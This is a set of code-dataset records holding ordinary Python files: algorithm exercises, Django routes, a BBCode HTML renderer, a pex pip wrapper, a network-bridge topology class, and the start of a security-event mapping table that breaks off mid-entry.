+{"seq_id":"240821460","text":"class Solution:\n def divide(self, dividend: int, divisor: int) -> int:\n # clamp the single 32-bit overflow case: -2**31 / -1\n if dividend == -2**31 and divisor == -1:\n return 2**31 - 1\n ans = 0\n sign = -1 if (dividend > 0) ^ (divisor > 0) else 1 # True ^ False = True, True ^ True = False, False ^ False = True,\n dividend, divisor = abs(dividend), abs(divisor)\n while dividend >= divisor:\n subtracted = divisor\n times = 1 # subtracted is the chunk being removed; times counts how many divisors that chunk contains\n while subtracted << 1 <= dividend: # while doubling subtracted still fits into dividend, double both\n subtracted <<= 1 # shift left one bit, i.e. multiply by 2\n times <<= 1\n ans += times\n dividend -= subtracted\n return ans * sign\n\nprint(Solution().divide(7,-3))","sub_path":"数学/29.两数相除.py","file_name":"29.两数相除.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
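The doubling loop in the record above is what keeps the division logarithmic rather than linear. A standalone restatement of the same idea, separate from the record (illustrative sketch for positive operands only):

# Standalone restatement of the doubling trick used in divide() above.
# For 43 // 5: the chunk doubles 5 -> 10 -> 20 -> 40 while times doubles
# 1 -> 2 -> 4 -> 8, so a single pass removes 40 (eight 5s) and leaves 3.
def div_positive(dividend, divisor):
    quotient = 0
    while dividend >= divisor:
        chunk, times = divisor, 1
        while chunk << 1 <= dividend:
            chunk <<= 1
            times <<= 1
        dividend -= chunk
        quotient += times
    return quotient

assert div_positive(43, 5) == 8
assert div_positive(7, 3) == 2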
+{"seq_id":"336110947","text":"lista = []\npares = []\nimpares = []\nwhile True:\n lista.append(int(input('Enter a value: ')))\n c = str(input('Do you want to continue? [Y/N] ')).strip()\n if c in 'Nn':\n break\n\nfor v in lista:\n if v % 2 == 0:\n pares.append(v)\n else:\n impares.append(v)\n\nprint(f'\\nThe complete list is {lista}')\nprint(f'The list of even values is {pares}')\nprint(f'The list of odd values is {impares}')","sub_path":"CursoemVideo/ex082.py","file_name":"ex082.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"578774613","text":"from django.conf.urls import url, include\r\nfrom django.contrib import admin\r\nfrom products import views\r\n\r\nurlpatterns = [\r\n url(r'^product/(?P<slug>\\w+)/$', views.product, name='product'), # capture-group name lost in extraction; 'slug' is a reconstruction\r\n url(r'^new_items/$', views.new_items, name='new_items'),\r\n url(r'^discounts/$', views.discounts, name='discounts'),\r\n url(r'^products_men/$', views.products_men, name='products_men'),\r\n url(r'^products_women/$', views.products_women, name='products_women'),\r\n url(r'^products_children/$', views.products_children, name='products_children'),\r\n]\r\n","sub_path":"mysite/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"292629850","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom flask import current_app as app\nfrom pkg_resources import parse_version as V\nfrom werkzeug import escape, unescape, url_quote, html as html_builder\nfrom .core import register_node, register_hook, BaseNode, \\\n PlainNode, RegexNode, NodeError\n\nURL_QUOTE_SAFE = b'/:;\"%&#()=?'\n\n\nclass _ListNode(BaseNode):\n display = 'block'\n list_builder = None\n\n def html(self, **kwargs):\n children = []\n innerhtml = ''\n\n def append_li(html):\n html = html.strip()\n if html:\n children.append(html_builder.li(html))\n return ''\n\n for node in self.children:\n if not node:\n continue\n if isinstance(node, PlainNode):\n innerhtml += node.html(**dict(kwargs, br=False)) # no br tags rendered here\n if node.has_linebreak:\n # plain text containing a line break found, close the current li\n innerhtml = append_li(innerhtml)\n else:\n innerhtml += node.html(**kwargs)\n if node.display == 'block':\n # block-level element found, close the current li\n innerhtml = append_li(innerhtml)\n\n # flush whatever innerhtml is left over from the loop\n append_li(innerhtml)\n # the callables returned by html_builder are single-use\n return getattr(html_builder, self.html_tagname)(*children)\n\n\n@register_node('ul')\nclass UlNode(_ListNode):\n name = 'ul'\n html_tagname = 'ul'\n\n\n@register_node('ol')\nclass OlNode(_ListNode):\n name = 'ol'\n html_tagname = 'ol'\n\n\n@register_node('url')\nclass URLNode(BaseNode):\n name = 'url'\n tag_excludes = ['url', '__at__', '__email__', '__url__']\n\n def __init__(self, value, children):\n if not value and not children:\n raise NodeError('URL must contain either value or children')\n if not children:\n children = [PlainNode(value)]\n super(URLNode, self).__init__(value, children)\n url = self.value if self.value else self.children_unicode()\n if url.lower()[:11] == 'javascript:':\n url = ''\n self.url = url\n\n def html(self, **kwargs):\n inside = self.children_html(**kwargs)\n # anchor markup reconstructed; the original tag was stripped during extraction\n return '<a href=\"%s\">%s</a>' % (\n escape(url_quote(self.url, safe=URL_QUOTE_SAFE), quote=True),\n inside)\n\n\n@register_node('image', 'img')\nclass ImageNode(BaseNode):\n name = 'image'\n tag_includes = []\n\n def __init__(self, value, children):\n if value or not children:\n raise NodeError('Image URL can only be specified from children')\n super(ImageNode, self).__init__(value, children)\n url = self.children_unicode()\n if url.lower()[:11] == 
'javascript:' or \\\n url.lower()[:9] == 'vbscript:':\n url = ''\n self.url = url\n\n def text(self):\n return ''\n\n def html(self, **kwargs):\n from guokr.platform.flask.helpers import resp_image\n from guokr.platform.flask.helpers import get_params, url2hashkey\n width = kwargs.get('resp_width', 480)\n url = resp_image(self.url, width)\n hashkey = url2hashkey(self.url, take_thumbnail=True)\n if not hashkey:\n # img markup reconstructed; the original tag was stripped during extraction\n return '<img src=\"%s\" width=\"%s\" />' % (\n escape(url_quote(url, safe=URL_QUOTE_SAFE), quote=True), width)\n\n w, h, file_type = get_params(hashkey)\n # img markup reconstructed; the data-* attribute names are a best guess\n return ('<img src=\"%s\" width=\"%s\" data-width=\"%s\" data-height=\"%s\" data-hashkey=\"%s\" />') % (\n escape(url_quote(url, safe=URL_QUOTE_SAFE), quote=True),\n width,\n w,\n h,\n hashkey)\n\n\n@register_node('bold', 'b')\nclass BoldNode(BaseNode):\n name = 'bold'\n tag_excludes = ['bold', 'b']\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n else:\n return '<b>%s</b>' % self.children_html(**kwargs)\n\n\n@register_node('italic', 'i')\nclass ItalicNode(BaseNode):\n name = 'italic'\n tag_excludes = ['italic', 'i']\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n else:\n return '<i>%s</i>' % self.children_html(**kwargs)\n\n\n@register_node('color')\nclass ColorNode(BaseNode):\n name = 'color'\n tag_excludes = ['color']\n html_colors = re.compile('^([A-Za-z]+|#[0-9A-Fa-f]{,6})$')\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n if self.value: # guard added to handle the no-argument case\n color = self.value.strip()\n else:\n color = '#000000' # default to black\n if not self.html_colors.match(color):\n style = ''\n else:\n style = 'color: ' + color + ';'\n # being lazy here: hex values without a leading '#' are not supported\n return '<span style=\"%s\">%s</span>' % (\n style, self.children_html(**kwargs))\n\n\n@register_node('quote', 'blockquote')\nclass QuoteNode(BaseNode):\n name = 'quote'\n display = 'block'\n tag_excludes = ['quote', 'blockquote']\n\n def html(self, **kwargs):\n return '<blockquote>%s</blockquote>' % self.children_html(**kwargs)\n\n\n@register_node('code')\nclass CodeNode(BaseNode):\n name = 'code'\n tag_excludes = ['code']\n\n def html(self, **kwargs):\n return '<code>%s</code>' % self.children_html(**dict(kwargs, br=False))\n\n\n@register_node('table', 'th', 'tr')\nclass TableNode(BaseNode):\n name = 'table'\n display = 'block'\n\n def html(self, **kwargs):\n innerhtml = []\n for child in self.children:\n if isinstance(child, PlainNode):\n innerhtml.append(child.html(**dict(kwargs, br=False)))\n else:\n innerhtml.append(child.html(**kwargs))\n return getattr(html_builder, self.name)(*innerhtml)\n\n\n@register_node('_html', 'td', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6')\nclass HTMLNode(BaseNode):\n name = 'td'\n display = 'block'\n\n def html(self, **kwargs):\n return getattr(html_builder, self.name)(self.children_html(**kwargs))\n\n\n@register_node('ref')\nclass RefNode(BaseNode):\n name = 'ref'\n tag_includes = []\n\n # the capture-group name 'path' is a reconstruction; extraction stripped it\n url_whitelist = re.compile(\n r'^(?:http://(?:(?:www)?\\.guokr\\.com|guo\\.kr))?'\n r'(?P<path>/(?:article|blog|question|answer|post)/\\d+|'\n r'/question/\\d+/answer/\\d+)/?(?:\\?|$)')\n\n def __init__(self, value, children):\n if value or not children:\n raise NodeError('Ref URL can only be specified from children')\n super(RefNode, self).__init__(value, children)\n url = self.children_unicode().strip()\n m = self.url_whitelist.search(url)\n if m:\n self.url = url.rstrip('/') + '/'\n else:\n raise NodeError('Invalid ref URL')\n\n def html(self, **kwargs):\n return html_builder.a(self.url, href=self.url, class_='bbcode-ref')\n\n\n@register_node('flash')\nclass FlashNode(BaseNode):\n name = 'flash'\n tag_includes = []\n\n def __init__(self, value, children):\n if value or not children:\n raise NodeError('Ref URL can only be specified from children')\n super(FlashNode, self).__init__(value, children)\n url = self.children_unicode().strip()\n if url.lower()[:11] == 'javascript:':\n url = ''\n self.url = url\n\n def html(self, **kwargs):\n width = kwargs.get('resp_width', 480)\n height = width * 5 / 6\n # TODO: use placeholder\n # embed markup reconstructed; the original tag was stripped during extraction\n return \\\n '<embed src=\"%s\" type=\"application/x-shockwave-flash\" width=\"%s\" height=\"%s\" />' % (\n escape(url_quote(self.url, safe=URL_QUOTE_SAFE), quote=True),\n width, height)\n\n\n@register_node('__url__', weight=100)\nclass RegexURLNode(RegexNode):\n name = '__url__'\n regex = re.compile(r\"\"\"(?iux)\n (?:https?|ftps?|ssh|sftp|ed2k|git|svn|svn\\+ssh|smb)\n ://[\\w\\?\\.=&+%/#;@:~!,()-]+\"\"\")\n\n @property\n def url(self):\n return self.value.group(0)\n\n def html(self, **kwargs):\n # anchor markup reconstructed; the original tag was stripped during extraction\n return '<a href=\"%s\">%s</a>' % (\n escape(url_quote(self.url, safe=URL_QUOTE_SAFE), quote=True),\n escape(self.url))\n\n\n@register_node('__at__', weight=30)\nclass AtNode(RegexNode):\n name = '__at__'\n # the '@(?P<nickname>' prefix below is a reconstruction; extraction stripped it\n regex = re.compile(r\"\"\"(?ux)@(?P<nickname>\n [\\w\\u3400-\\u4db5\\u4e00-\\u9fcb\\.-]{1,20}\n )\"\"\")\n\n @property\n def nickname(self):\n return self.value.group('nickname')\n\n def html(self, **kwargs):\n from flask import url_for\n nickname = self.value.group('nickname')\n if app:\n # anchor markup reconstructed; the original tag was stripped during extraction\n return '<a href=\"%s\">@%s</a>' % (\n url_for(\n 'community:profile.nickname_redirect', nickname=nickname),\n escape(nickname))\n else:\n return '@%s' % escape(nickname)\n\n\n@register_node('__email__', weight=80)\nclass EmailNode(RegexNode):\n name = '__email__'\n regex = re.compile(r'(?i)[\\w+\\.-]+@[\\w][\\w\\.-]*\\.[a-z]{2,10}')\n\n @property\n def email(self):\n return self.value.group(0)\n\n def html(self, **kwargs):\n # mailto anchor reconstructed; the original markup was stripped during extraction\n return '<a href=\"mailto:%s\">%s</a>' % (\n escape(self.email, quote=True),\n escape(self.email))\n\n\n@register_node('math')\nclass MathMode(BaseNode):\n name = 'math'\n tag_includes = []\n\n @property\n def math(self):\n ret = ''\n for node in self.children:\n if node:\n ret += node.html(br=False)\n return unescape(ret)\n\n @property\n def hashed(self):\n import hashlib\n
 return hashlib.sha1(self.math).hexdigest()\n\n @property\n def format(self):\n from flask import request\n browser = request.user_agent.browser\n version = V(request.user_agent.version or '')\n # version = float('.'.join(version.split('.', 2)[:2])) if version else\n # None\n if not browser or not version:\n return 'png'\n if (\n (browser == 'msie' and version >= V('9')) or # trident >= 5.0\n (browser == 'firefox' and version >= V('4')) or # gecko >= 2.0\n (browser == 'webkit' and version >= V('522')) or # webkit >= 522\n browser == 'chrome' or browser == 'konqueror' or # all versions\n (browser == 'safari' and version >= V('3.0')) or # webkit >= 522\n (browser == 'opera' and version > V('9.5'))): # presto >= 2.1\n return 'svg'\n else:\n return 'png'\n\n def html(self, **kwargs):\n from flask import url_for\n width = kwargs.get('resp_width', 480)\n\n # img markup reconstructed; the attribute layout is a best guess\n return ('<img src=\"%s\" alt=\"%s\" style=\"max-width: %spx\" />') % (\n url_for(\n 'image:formula',\n hashed=self.hashed,\n format=self.format),\n escape(self.math, quote=True), width)\n\n def text(self):\n return ''\n\n\n@register_node('indent')\nclass IndentNode(BaseNode):\n\n \"\"\"Rendering of the indent tag\"\"\"\n name = 'indent'\n display = 'block'\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n return html_builder.div(self.children_html(**dict(kwargs, br=False)),\n class_=\"bbcode-indent\")\n\n\n@register_node('float')\nclass FloatNode(BaseNode):\n\n \"\"\"Support for the float tag\"\"\"\n name = 'float'\n display = 'block'\n tag_excludes = ['float']\n html_float = re.compile('^(left|right)$')\n\n def html(self, **kwargs):\n if not self.children:\n return ''\n if self.value: # check whether an argument was given, otherwise an AttributeError is raised\n direction = self.value.strip()\n else:\n direction = 'left' # float left by default\n if not self.html_float.match(direction):\n style = ''\n else:\n style = 'bbcode-float-' + direction\n return html_builder.div(self.children_html(**dict(kwargs, br=False)),\n class_=style)\n\n\n@register_hook('after_parse')\ndef math_hook(bbcode):\n from guokr.platform.apis import APIServerError, APIClientError\n from guokr.platform.apis.confidential import formula\n from guokr.platform.engines import _share_redis\n math_map = {}\n for node in bbcode.filter('math'):\n math_map[node.hashed] = node.math\n if not math_map:\n return\n hashed = math_map.keys()\n # check via redis whether each formula has already been generated\n result = _share_redis.hmget('image-formula', hashed)\n math_exist = zip(hashed, result)\n for hashed, is_exist in math_exist:\n if is_exist is None:\n # create synchronously to make sure it renders correctly\n # rendering a formula is a heavy operation, so issue a separate request to avoid excessive load\n try:\n formula.create(tex=math_map[hashed], confirm=True)\n except (APIServerError, APIClientError):\n pass\n","sub_path":"frame/platform_src/contribs/bbcode/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":13490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"223864644","text":"\"\"\"\nProgram Name: Programming Problems Q13\nProgrammer: Hyun Wook Kim\nDate: 2018.06.30\nDescription:\n Write a program that counts how many letters and how many digits\n the input contains.\n\"\"\"\n\nif __name__ == '__main__':\n ip = input()\n l_count = 0\n d_count = 0\n\n for i in range(len(ip)):\n if ip[i].isalpha():\n l_count += 1\n elif ip[i].isdigit():\n d_count += 1\n\n print(\"LETTERS %s\\nDIGITS %s\" % (l_count, d_count))\n","sub_path":"Taco101_Python/ProgrammingProblems/Q13.py","file_name":"Q13.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"478843220","text":"# coding=utf-8\n# Copyright 2019 Pants project contributors (see 
CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import absolute_import, print_function\n\nimport os\nfrom collections import deque\n\nfrom pex import third_party\nfrom pex.interpreter import PythonInterpreter\nfrom pex.platforms import Platform\nfrom pex.variables import ENV\n\n\nclass PipError(Exception):\n \"\"\"Indicates an error running a pip command.\"\"\"\n\n\ndef execute_pip_isolated(args, cache=None, interpreter=None):\n env = os.environ.copy()\n env['__PEX_UNVENDORED__'] = '1'\n\n pythonpath = third_party.expose(['pip', 'setuptools', 'wheel'])\n\n pip_args = ['-m', 'pip', '--disable-pip-version-check', '--isolated']\n\n # The max pip verbosity is -vvv and for pex it's -vvvvvvvvv; so we scale down by a factor of 3.\n verbosity = ENV.PEX_VERBOSE // 3\n if verbosity > 0:\n pip_args.append('-{}'.format('v' * verbosity))\n else:\n pip_args.append('-q')\n\n if cache:\n pip_args.extend(['--cache-dir', cache])\n else:\n pip_args.append('--no-cache-dir')\n\n pip_cmd = pip_args + args\n\n interpreter = interpreter or PythonInterpreter.get()\n cmd, process = interpreter.open_process(args=pip_cmd, pythonpath=pythonpath, env=env)\n if process.wait() != 0:\n raise PipError('Executing {} failed with {}'.format(' '.join(cmd), process.returncode))\n\n\ndef _calculate_package_index_options(indexes=None, find_links=None):\n # N.B.: We interpret None to mean accept pip index defaults, [] to mean turn off all index use.\n if indexes is not None:\n if len(indexes) == 0:\n yield '--no-index'\n else:\n all_indexes = deque(indexes)\n yield '--index-url'\n yield all_indexes.popleft()\n if all_indexes:\n for extra_index in all_indexes:\n yield '--extra-index-url'\n yield extra_index\n\n if find_links:\n for find_link_url in find_links:\n yield '--find-links'\n yield find_link_url\n\n\ndef download_distributions(target,\n requirements=None,\n requirement_files=None,\n constraint_files=None,\n allow_prereleases=False,\n transitive=True,\n interpreter=None,\n platform=None,\n indexes=None,\n find_links=None,\n cache=None,\n build=True,\n use_wheel=True):\n\n download_cmd = ['download', '--dest', target]\n download_cmd.extend(_calculate_package_index_options(indexes=indexes, find_links=find_links))\n\n if platform:\n # TODO(John Sirois): Consider moving this parsing up to the CLI and switching the API to take\n # an (extended) `Platform` object instead of a string.\n platform_info = Platform.create(platform)\n if not platform_info.is_extended:\n raise PipError('Can only download distributions for fully specified platforms, given {!r}.'\n .format(platform))\n\n foreign_platform = platform_info != Platform.of_interpreter(interpreter)\n if foreign_platform:\n # We're either resolving for a different host / platform or a different interpreter for the\n # current platform that we have no access to; so we need to let pip know and not otherwise\n # pickup platform info from the interpreter we execute pip with.\n download_cmd.extend(['--platform', platform_info.platform])\n download_cmd.extend(['--implementation', platform_info.impl])\n download_cmd.extend(['--python-version', platform_info.version])\n download_cmd.extend(['--abi', platform_info.abi])\n else:\n foreign_platform = False\n\n if not use_wheel:\n if not build:\n raise PipError('Cannot both ignore wheels (use_wheel=False) and refrain from building '\n 'distributions (build=False).')\n elif foreign_platform:\n raise PipError('Cannot ignore wheels (use_wheel=False) when resolving for a foreign '\n 
'platform: {}'.format(platform))\n\n if foreign_platform or not build:\n download_cmd.extend(['--only-binary', ':all:'])\n\n if not use_wheel:\n download_cmd.extend(['--no-binary', ':all:'])\n\n if allow_prereleases:\n download_cmd.append('--pre')\n\n if not transitive:\n download_cmd.append('--no-deps')\n\n if requirement_files:\n for requirement_file in requirement_files:\n download_cmd.extend(['--requirement', requirement_file])\n\n if constraint_files:\n for constraint_file in constraint_files:\n download_cmd.extend(['--constraint', constraint_file])\n\n if requirements:\n download_cmd.extend(requirements)\n\n execute_pip_isolated(download_cmd, cache=cache, interpreter=interpreter)\n\n\ndef build_wheels(distributions,\n target,\n interpreter=None,\n indexes=None,\n find_links=None,\n cache=None):\n wheel_cmd = ['wheel', '--no-deps', '--wheel-dir', target]\n\n # If the build is PEP-517 compliant it may need to resolve build requirements.\n wheel_cmd.extend(_calculate_package_index_options(indexes=indexes, find_links=find_links))\n\n wheel_cmd.extend(distributions)\n execute_pip_isolated(wheel_cmd, cache=cache, interpreter=interpreter)\n\n\ndef install_wheel(wheel, target, compile=False, overwrite=False, cache=None, interpreter=None):\n install_cmd = ['install', '--no-deps', '--no-index', '--only-binary', ':all:', '--target', target]\n install_cmd.append('--compile' if compile else '--no-compile')\n if overwrite:\n install_cmd.extend(['--upgrade', '--force-reinstall'])\n install_cmd.append(wheel)\n execute_pip_isolated(install_cmd, cache=cache, interpreter=interpreter)\n","sub_path":"pex/pip.py","file_name":"pip.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
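For context, a quick illustration of what the index-option generator in the pex record above yields. This is an illustrative sketch only; the index URLs and wheelhouse path are made up, and it assumes _calculate_package_index_options is importable from pex/pip.py.

# Hypothetical invocation of the generator above; URLs/paths are made up.
flags = list(_calculate_package_index_options(
    indexes=['https://pypi.org/simple', 'https://example.test/simple'],
    find_links=['/tmp/wheelhouse']))
# flags is now:
# ['--index-url', 'https://pypi.org/simple',
#  '--extra-index-url', 'https://example.test/simple',
#  '--find-links', '/tmp/wheelhouse']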
+{"seq_id":"96963437","text":"# @Time : 2019/5/14 7:12\n# @Author : Xu Huipeng\n# @Blog : https://brycexxx.github.io/\n\nfrom typing import List, Tuple, Optional\nimport heapq\n\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n ret = ListNode(0)\n\n def argmin(lists: List[ListNode]) -> Tuple[int, int]:\n idx = 0\n min_ = float('inf')\n for i in range(len(lists)):\n if lists[i] and lists[i].val < min_:\n min_ = lists[i].val\n idx = i\n return idx, min_\n\n node = ret\n while any(lists):\n idx, min_val = argmin(lists)\n node.next = ListNode(min_val)\n node = node.next\n lists[idx] = lists[idx].next\n return ret.next\n\n # min-heap, in place\n def mergeKLists1(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n ret = ListNode(0)\n heap = []\n # build the heap\n for i, lst in enumerate(lists):\n if lst: heapq.heappush(heap, (lst.val, i, lst))\n node = ret\n while heap:\n min_val, i, n = heapq.heappop(heap)\n node.next = n\n node = node.next\n if n.next:\n heapq.heappush(heap, (n.next.val, i, n.next))\n n.next = None\n return ret.next\n\n # min-heap\n def mergeKLists2(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n ret = ListNode(0)\n heap = []\n # build the heap\n for i, lst in enumerate(lists):\n val = lst.val if lst else float('inf')\n heapq.heappush(heap, (val, i))\n if lists[i]: lists[i] = lists[i].next\n node = ret\n while True:\n min_val, idx = heapq.heappop(heap)\n if min_val == float('inf'): break\n node.next = ListNode(min_val)\n node = node.next\n new_val = lists[idx].val if lists[idx] else float('inf')\n heapq.heappush(heap, (new_val, idx))\n if lists[idx]: lists[idx] = lists[idx].next\n return ret.next\n\n # divide and conquer\n def mergeKLists3(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n\n def merge(n1: ListNode, n2: ListNode) -> ListNode:\n if not n1 and n2: return n2\n if not n2 and n1: return n1\n ret = ListNode(0)\n node = ret\n while n1 and n2:\n if n1.val < n2.val:\n node.next = ListNode(n1.val)\n n1 = n1.next\n else:\n node.next = ListNode(n2.val)\n n2 = n2.next\n node = node.next\n if n1: node.next = n1\n if n2: node.next = n2\n return ret.next\n\n def merge_part_c(start: int, end: int) -> ListNode:\n if end - start <= 1: return lists[start]\n mid = start + ((end - start) >> 1)\n n1 = merge_part_c(start, mid)\n n2 = merge_part_c(mid, end)\n n = merge(n1, n2)\n return n\n\n return merge_part_c(0, len(lists))\n\n # divide and conquer, in place\n def mergeKLists4(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n\n def merge(n1: ListNode, n2: ListNode) -> ListNode:\n if not n1 and n2: return n2\n if not n2 and n1: return n1\n ret = ListNode(0)\n node = ret\n while n1 and n2:\n if n1.val < n2.val:\n node.next = n1\n n1 = n1.next\n else:\n node.next = n2\n n2 = n2.next\n node = node.next\n if n1: node.next = n1\n if n2: node.next = n2\n return ret.next\n\n def merge_part_c(start: int, end: int) -> ListNode:\n if end - start <= 1: return lists[start]\n mid = start + ((end - start) >> 1)\n n1 = merge_part_c(start, mid)\n n2 = merge_part_c(mid, end)\n n = merge(n1, n2)\n return n\n\n return merge_part_c(0, len(lists))\n\n # divide and conquer, in place\n def mergeKLists5(self, lists: List[ListNode]) -> Optional[ListNode]:\n if not lists: return None\n\n def merge(n1: ListNode, n2: ListNode) -> ListNode:\n if not n1: return n2\n if not n2: return n1\n if n1.val < n2.val:\n n1.next = merge(n1.next, n2)\n return n1\n else:\n n2.next = merge(n1, n2.next)\n return n2\n\n def merge_part_c(start: int, end: int) -> ListNode:\n if end - start <= 1: return lists[start]\n mid = start + ((end - start) >> 1)\n n1 = merge_part_c(start, mid)\n n2 = merge_part_c(mid, end)\n n = merge(n1, n2)\n return n\n\n return merge_part_c(0, len(lists))\n","sub_path":"mergeKLists.py","file_name":"mergeKLists.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"559697002","text":"from .topology import TopologyMember\nfrom .netdev import NetDev\n\n\nclass Bridge(TopologyMember):\n REF = 'bridge'\n DESC = {'title': 'Bridge Interface'}\n SCHEMA = {\n 'type': 'object',\n 'additionalProperties': False,\n 'required': ['name', 'netns'],\n 'properties': {\n 'name': {'type': 'string'},\n 'ports': {'type': 'array', 'items': {'type': 'string'}},\n **NetDev.DEV_PROPS\n }\n }\n\n def __init__(self, topology, name, ns, ports, dev_args=None):\n super().__init__(topology, name)\n dev_args = dev_args or {}\n self.dev = NetDev(topology=topology, name=name, owner=self, ns=ns,\n ports=ports, **dev_args)\n key = '%s.%s' % (self.REF, self.name)\n self.topology.members['%s.dev' % key] = self.dev\n for p in self.dev.ports:\n p.master = self\n self.topology.add_l2_conn(self.dev, p)\n self.topology.add_prereq(self, p)\n\n @classmethod\n def from_params(cls, topology, params):\n port_names = params.get('ports') or []\n ports = [topology.members[p] for p in port_names]\n dev_args = NetDev.args_from_params(topology, params)\n ns = topology.members[params['netns']]\n return cls(topology, params['name'], ns, ports, dev_args)\n\n def render_dot(self):\n for p in self.dev.ports:\n self.p('%s -- %s [color=\"blue\"]' % 
(self.dev.dotname,\n p.dotname))\n\n def render_bash(self):\n self.p('ip -net %s link add %s type %s ' % (self.dev.ns.name,\n self.dev.name,\n self.REF))\n self.dev.render_bash()\n\n for p in self.dev.ports:\n self.p('ip -net %s link set %s master %s' % (self.dev.ns.name,\n p.name,\n self.dev.name))\n","sub_path":"netpen/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"39386573","text":"# Copyright 2015 refractionPOINT\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom beach.actor import Actor\nimport re\nimport ipaddress\nimport traceback\nimport base64\nimport json\nimport uuid\n_x_ = Actor.importLib( './hcp_helpers', '_x_' )\n_xm_ = Actor.importLib( './hcp_helpers', '_xm_' )\nexeFromPath = Actor.importLib( './hcp_helpers', 'exeFromPath' )\nnormalAtom = Actor.importLib( './hcp_helpers', 'normalAtom' )\nObjectTypes = Actor.importLib( './ObjectsDb', 'ObjectTypes' )\n\n# The event tuples are: ( eventTypeDescription, funcForKey, funcForShortKey, funcForNarrative )\n\n_eventTypes = {\n 'notification.NEW_PROCESS' : ( 'new process starting',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s with pid %s is starting.' % ( _x_( x, '?/base.FILE_PATH' ),\n _x_( x, '?/base.PROCESS_ID' ) ),\n lambda x: ( exeFromPath( _x_( x, '?/base.FILE_PATH' ) ), ObjectTypes.PROCESS_NAME ) ),\n 'notification.EXISTING_PROCESS' : ( 'pre-existing process',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The process %s with pid %s is already running.' % ( _x_( x, '?/base.FILE_PATH' ),\n _x_( x, '?/base.PROCESS_ID' ) ),\n lambda x: ( exeFromPath( _x_( x, '?/base.FILE_PATH' ) ), ObjectTypes.PROCESS_NAME ) ),\n 'notification.TERMINATE_PROCESS' : ( 'a process is terminating',\n lambda x: _x_( x, '?/base.PROCESS_ID' ),\n lambda x: _x_( x, '?/base.PROCESS_ID' ),\n lambda x: 'The process with pid %s is terminating.' % ( _x_( x, '?/base.PROCESS_ID' ), ),\n lambda x: ( None, None ) ),\n 'notification.CODE_IDENTITY' : ( 'new unique code executed',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The code on disk at %s was executed for the first time.' % ( _x_( x, '?/base.FILE_PATH' ), ),\n lambda x: ( _x_( x, '?/base.HASH' ), ObjectTypes.FILE_HASH ) ),\n 'notification.DNS_REQUEST' : ( 'new domain name request',\n lambda x: _x_( x, '?/base.DOMAIN_NAME' ),\n lambda x: _x_( x, '?/base.DOMAIN_NAME' ),\n lambda x: 'A request for the domain name %s.' % ( _x_( x, '?/base.DOMAIN_NAME' ), ),\n lambda x: ( _x_( x, '?/base.DOMAIN_NAME' ), ObjectTypes.DOMAIN_NAME ) ),\n 'notification.MODULE_LOAD' : ( 'a module is being loaded',\n lambda x: _x_( x, '?/base.FILE_PATH' ),\n lambda x: exeFromPath( _x_( x, '?/base.FILE_PATH' ) ),\n lambda x: 'The code on disk at %s was loaded into %s.' 
